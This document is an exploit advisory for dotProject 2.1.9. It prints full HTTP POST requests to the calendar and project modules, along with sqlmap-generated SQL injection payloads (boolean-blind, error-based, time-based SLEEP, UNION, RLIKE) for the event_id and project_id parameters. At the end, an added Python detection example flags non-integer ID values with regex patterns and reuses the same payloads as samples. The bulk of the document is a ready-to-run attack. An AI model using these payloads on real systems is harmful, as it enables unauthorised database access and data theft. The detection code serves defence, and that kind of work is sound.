"dotProject 2.1.9 - SQL Injection"

Author: Metin Yunus Kandemir
Platform: php
Release date: 2019-06-24

# Exploit Title: dotProject 2.1.9 - Multiple SQL Injection (PoC)
# Exploit Author: Metin Yunus Kandemir (kandemir)
# Vendor Homepage: https://dotproject.net
# Software Link: https://github.com/dotproject/dotProject/archive/v2.1.9.zip
# Version: 2.1.9
# Category: Webapps
# Tested on: Xampp for Windows
# Software Description: dotProject is a volunteer-supported project management application. There is no "company" behind this project; it is managed, maintained, developed and supported by a volunteer group and by the users themselves.

==================================================================


event_id (POST) - SQL injection PoC

POST /dotProject-2.1.9/index.php?m=calendar HTTP/1.1
Host: xxx.xxx.x.xx
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://xxx.xxx.x.xx/dotProject-2.1.9/index.php?m=calendar&a=addedit
Content-Type: application/x-www-form-urlencoded
Content-Length: 273
Cookie: dotproject=gfkt21luioqv9eoh25hdaloe7v; client_lang=english; client_login_name=test1
Connection: close
Upgrade-Insecure-Requests: 1

dosql=do_event_aed&event_id=0&event_project=[SQLi]&event_assigned=1&event_title=test&event_description=hkffkfuy&event_type=0&event_project=0&event_start_date=20190621&start_time=080000&event_end_date=20190621&end_time=170000&event_recurs=0&event_times_recuring=1&mail_invited=on

Parameter: event_id (POST)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: dosql=do_event_aed&event_id=0) AND 3236=3236-- rnpG&event_project=0&event_assigned=1&event_title=test&event_description=hkffkfuy&event_type=0&event_project=0&event_start_date=20190621&start_time=080000&event_end_date=20190621&end_time=170000&event_recurs=0&event_times_recuring=1&mail_invited=on

    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
    Payload: dosql=do_event_aed&event_id=0) AND (SELECT 7581 FROM(SELECT COUNT(*),CONCAT(0x7170787a71,(SELECT (ELT(7581=7581,1))),0x71627a6271,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- bOIA&event_project=0&event_assigned=1&event_title=test&event_description=hkffkfuy&event_type=0&event_project=0&event_start_date=20190621&start_time=080000&event_end_date=20190621&end_time=170000&event_recurs=0&event_times_recuring=1&mail_invited=on

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: dosql=do_event_aed&event_id=0) AND (SELECT 6637 FROM (SELECT(SLEEP(5)))bNDB)-- NfAk&event_project=0&event_assigned=1&event_title=test&event_description=hkffkfuy&event_type=0&event_project=0&event_start_date=20190621&start_time=080000&event_end_date=20190621&end_time=170000&event_recurs=0&event_times_recuring=1&mail_invited=on

    Type: UNION query
    Title: Generic UNION query (NULL) - 1 column
    Payload: dosql=do_event_aed&event_id=0) UNION ALL SELECT CONCAT(0x7170787a71,0x646772547a6e58774c464e54416963614c64646c7a6f6c745748597350686f535979714443794859,0x71627a6271)-- xXFB&event_project=0&event_assigned=1&event_title=test&event_description=hkffkfuy&event_type=0&event_project=0&event_start_date=20190621&start_time=080000&event_end_date=20190621&end_time=170000&event_recurs=0&event_times_recuring=1&mail_invited=on



==================================================================


MULTIPART project_id ((custom) POST) - SQL Injection PoC

POST /dotProject-2.1.9/index.php?m=projects HTTP/1.1
Host: 192.168.1.33
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://192.168.1.33/dotProject-2.1.9/index.php?m=projects&a=addedit
Content-Type: multipart/form-data; boundary=---------------------------9310663371787104596119761620
Content-Length: 2749
Cookie: dotproject=gfkt21luioqv9eoh25hdaloe7v; client_lang=english; client_login_name=test1
Connection: close
Upgrade-Insecure-Requests: 1

-----------------------------9310663371787104596119761620
Content-Disposition: form-data; name="dosql"

do_project_aed
-----------------------------9310663371787104596119761620
Content-Disposition: form-data; name="project_id"

[SQLi]
-----------------------------9310663371787104596119761620
Content-Disposition: form-data; name="project_creator"

1
.
..snip
..snip
.

-----------------------------9310663371787104596119761620
Content-Disposition: form-data; name="import_tasks_from"

0
-----------------------------9310663371787104596119761620
Content-Disposition: form-data; name="project_description"

fasdf
-----------------------------9310663371787104596119761620--



Parameter: MULTIPART project_id ((custom) POST)
    Type: boolean-based blind
    Title: MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause
    Payload: 0 RLIKE (SELECT (CASE WHEN (6146=6146) THEN '' ELSE 0x28 END))

    Type: error-based
    Title: MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)
    Payload: 0 AND EXTRACTVALUE(9751,CONCAT(0x5c,0x716b767871,(SELECT (ELT(9751=9751,1))),0x716b6a6a71))

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: 0 AND (SELECT 6725 FROM (SELECT(SLEEP(5)))WETe)
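Both parameters above (event_id in the calendar form, project_id in the project form) are integer IDs, so a request in which they carry anything but digits is already anomalous. The following is an added detection example, not code from the advisory or from dotProject: it parses urlencoded bodies like the calendar PoC, takes multipart fields as an already-parsed dict (assumption, no multipart parser is included), and tags each suspicious value with the technique families visible in the sqlmap output on this page. The field set INT_ID_FIELDS and the sample bodies are constructed for the example.

```python
"""Flag SQL-injection-shaped values in the integer ID fields that dotProject's
calendar and project forms post (event_id, project_id). Added detection example."""
import re
from urllib.parse import parse_qs

# Fields dotProject treats as numeric IDs in the two PoCs on this page (assumption:
# any other integer ID field the application reads can be added here).
INT_ID_FIELDS = {"event_id", "project_id", "event_project", "project_creator"}
# The injection techniques visible in the sqlmap output above, as detection patterns.
TECHNIQUE_PATTERNS = {
    "boolean-based": re.compile(r"\b(AND|OR)\b\s*\(?\s*\d+\s*=\s*\d+", re.I),
    "error-based": re.compile(r"\bEXTRACTVALUE\s*\(|\bFLOOR\s*\(\s*RAND\s*\(", re.I),
    "time-based": re.compile(r"\b(SLEEP|BENCHMARK)\s*\(", re.I),
    "union": re.compile(r"\bUNION\b(\s+ALL)?\s+SELECT\b", re.I),
    "rlike": re.compile(r"\bRLIKE\b", re.I),
}
COMMENT_TAIL = re.compile(r"--\s|#|/\*")  # the urlencoded payloads above end in a comment

def inspect_fields(fields):
    """fields: {name: value}. Returns {field: [techniques]} for every ID field whose
    value is not a plain integer, the only legitimate shape for these fields."""
    findings = {}
    for name, value in fields.items():
        if name not in INT_ID_FIELDS or re.fullmatch(r"\d+", value):
            continue
        hits = [t for t, pat in TECHNIQUE_PATTERNS.items() if pat.search(value)]
        if COMMENT_TAIL.search(value):
            hits.append("comment-truncation")
        findings[name] = hits or ["unclassified-non-integer"]
    return findings

def inspect_urlencoded(body):
    """Inspect an application/x-www-form-urlencoded body (the calendar PoC format)."""
    parsed = parse_qs(body, keep_blank_values=True)
    # dotProject reads one value per field; the PoC repeats event_project, keep the first.
    return inspect_fields({k: v[0] for k, v in parsed.items()})

# Constructed request bodies: the injected event_id values are those shown in the
# sqlmap output above; the trailing benign fields are shortened.
SAMPLE_BODIES = {
    "benign": "dosql=do_event_aed&event_id=0&event_project=0&event_title=test",
    "boolean": "dosql=do_event_aed&event_id=0) AND 3236=3236-- rnpG&event_project=0",
    "time": "dosql=do_event_aed&event_id=0) AND (SELECT 6637 FROM (SELECT(SLEEP(5)))bNDB)-- NfAk&event_project=0",
    "union": "dosql=do_event_aed&event_id=0) UNION ALL SELECT CONCAT(0x7170787a71,0x64,0x71627a6271)-- xXFB&event_project=0",
}

def run_samples():
    """Map each sample body to its findings."""
    return {name: inspect_urlencoded(body) for name, body in SAMPLE_BODIES.items()}
```

The integer check is the durable signal; the technique patterns only label what was seen, and a proxy or WAF that enforces the integer shape on these fields catches variants the patterns miss.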

